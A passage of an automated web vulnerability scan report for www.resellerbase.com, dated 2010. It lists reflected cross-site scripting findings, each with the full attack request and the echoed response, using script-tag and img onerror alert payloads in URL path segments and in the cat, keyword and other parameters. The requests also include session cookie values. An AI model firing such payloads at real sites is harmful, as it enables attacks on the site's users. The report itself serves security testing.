Date: Wed, 17 Nov 2010 21:28:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee4d36<script>alert(1)</script>f501cd8677a/web-hosting/ was not found on this server.</p>
...[SNIP]...

2.5493. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 622db<script>alert(1)</script>ed67bae98ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting622db<script>alert(1)</script>ed67bae98ea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting622db<script>alert(1)</script>ed67bae98ea/ was not found on this server.</p>
...[SNIP]...

2.5494. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb0e7<script>alert(1)</script>fc9c36ed2ace1ebbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/web-hostingfb0e7<script>alert(1)</script>fc9c36ed2ace1ebbb/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingfb0e7<script>alert(1)</script>fc9c36ed2ace1ebbb/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5495. http://www.resellerbase.com/web-service/web-hosting/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38efa<script>alert(1)</script>d075fc606a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/?38efa<script>alert(1)</script>d075fc606a9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/?38efa<script>alert(1)</script>d075fc606a9=1 was not found on this server.</p>
...[SNIP]...

2.5496. http://www.resellerbase.com/web-service/web-hosting/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 46bda<a>d270b165c56 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f46bda<a>d270b165c56 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f46bda<a>d270b165c56 was not found on this server.</p>
...[SNIP]...

2.5497. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82aee<script>alert(1)</script>c2ae08e58eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service82aee<script>alert(1)</script>c2ae08e58eb/web-hosting/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service82aee<script>alert(1)</script>c2ae08e58eb/web-hosting/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5498. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7f3c<script>alert(1)</script>7ad4bb23ae9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingb7f3c<script>alert(1)</script>7ad4bb23ae9/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingb7f3c<script>alert(1)</script>7ad4bb23ae9/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5499. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3c15<script>alert(1)</script>1d0a35e524f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/googlepr.phpa3c15<script>alert(1)</script>1d0a35e524f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/googlepr.phpa3c15<script>alert(1)</script>1d0a35e524f was not found on this server.</p>
...[SNIP]...

2.5500. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload f1ad4<a>20a4f6198aa was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/googlepr.php?link_id=7f1ad4<a>20a4f6198aa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/googlepr.php?link_id=7f1ad4<a>20a4f6198aa was not found on this server.</p>
...[SNIP]...

2.5501. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d3bd<script>alert(1)</script>c6fa8335fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/googlepr.php?9d3bd<script>alert(1)</script>c6fa8335fbf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/googlepr.php?9d3bd<script>alert(1)</script>c6fa8335fbf=1 was not found on this server.</p>
...[SNIP]...

2.5502. http://www.resellerbase.com/web-service/web-hosting/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9869<script>alert(1)</script>545da06e830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea9869<script>alert(1)</script>545da06e830/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea9869<script>alert(1)</script>545da06e830/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5503. http://www.resellerbase.com/web-service/web-hosting/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6783e<script>alert(1)</script>78fc703698e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting6783e<script>alert(1)</script>78fc703698e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting6783e<script>alert(1)</script>78fc703698e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5504. http://www.resellerbase.com/web-service/web-hosting/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bdcf<script>alert(1)</script>494500c4dc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/search.php3bdcf<script>alert(1)</script>494500c4dc8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php3bdcf<script>alert(1)</script>494500c4dc8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5505. http://www.resellerbase.com/web-service/web-hosting/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9545b<a>be07f0c28f8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/search.php?keyword=search...&Submit3=Search9545b<a>be07f0c28f8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...&Submit3=Search9545b<a>be07f0c28f8&opt=2 was not found on this server.</p>
...[SNIP]...

2.5506. http://www.resellerbase.com/web-service/web-hosting/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3608c"><img%20src%3da%20onerror%3dalert(1)>c38f7989fac77711d was submitted in the cat parameter. This input was echoed as 3608c\"><img src=a onerror=alert(1)>c38f7989fac77711d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/web-hosting/search.php?cat=23608c"><img%20src%3da%20onerror%3dalert(1)>c38f7989fac77711d&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:48:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=23608c\"><img src=a onerror=alert(1)>c38f7989fac77711d">
...[SNIP]...

2.5507. http://www.resellerbase.com/web-service/web-hosting/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad6"><img%20src%3da%20onerror%3dalert(1)>801e9535147 was submitted in the cat parameter. This input was echoed as 3dad6\"><img src=a onerror=alert(1)>801e9535147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/web-hosting/search.php?cat=23dad6"><img%20src%3da%20onerror%3dalert(1)>801e9535147&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:48:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=23dad6\"><img src=a onerror=alert(1)>801e9535147">
...[SNIP]...

2.5508. http://www.resellerbase.com/web-service/web-hosting/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b451e<a>f47895624a0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/search.php?keyword=search...b451e<a>f47895624a0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...b451e<a>f47895624a0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5509. http://www.resellerbase.com/web-service/web-hosting/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ef2b<script>alert(1)</script>a090d1d60e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2&4ef2b<script>alert(1)</script>a090d1d60e6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2&4ef2b<script>alert(1)</script>a090d1d60e6=1 was not found on this server.</p>
...[SNIP]...

2.5510. http://www.resellerbase.com/web-service/web-hosting/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cd28e<a>7b45bce360b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2cd28e<a>7b45bce360b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
